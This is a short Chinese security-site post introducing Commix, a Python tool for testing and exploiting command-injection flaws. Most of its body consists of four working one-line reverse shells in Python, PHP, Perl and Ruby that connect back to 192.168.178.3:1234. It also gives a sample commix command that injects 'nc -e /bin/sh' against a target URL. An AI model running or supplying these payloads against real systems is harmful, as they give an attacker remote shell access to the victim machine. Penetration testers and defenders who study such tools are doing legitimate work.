Commix – 自动化命令注入测试与利用工具-Commix - 自动化命令注入测试与利用工具-华盟网

Commix – 自动化命令注入测试与利用工具

华盟学院山东省第二期线下学习计划


项目首页:

https://github.com/stasinopoulos/commix

项目简介:

Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。

在作者所写的使用案例中还附送了一些反弹shell的技巧,如下:

1. Python-reverse-shell:

python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

www.idc126.com


2. PHP-reverse-shell:

php-r'$sock=fsockopen("192.168.178.3",1234);exec("/bin/sh -i <%263 >%263 2>%263");'


3. Perl-reverse-shell:

perl-e'use Socket;$i="192.168.178.3";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S");open(STDOUT,">%26S");open(STDERR,">%26S");exec("/bin/sh -i");};'


4. Ruby-reverse-shell:

ruby-rsocket-e'exit 

if fork;c=TCPSocket.new("192.168.178.3",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

使用方法:

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"


对于具体的测试方法与利用模块的开发可以去其github进行阅读。

文章出处:黑客工具箱

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论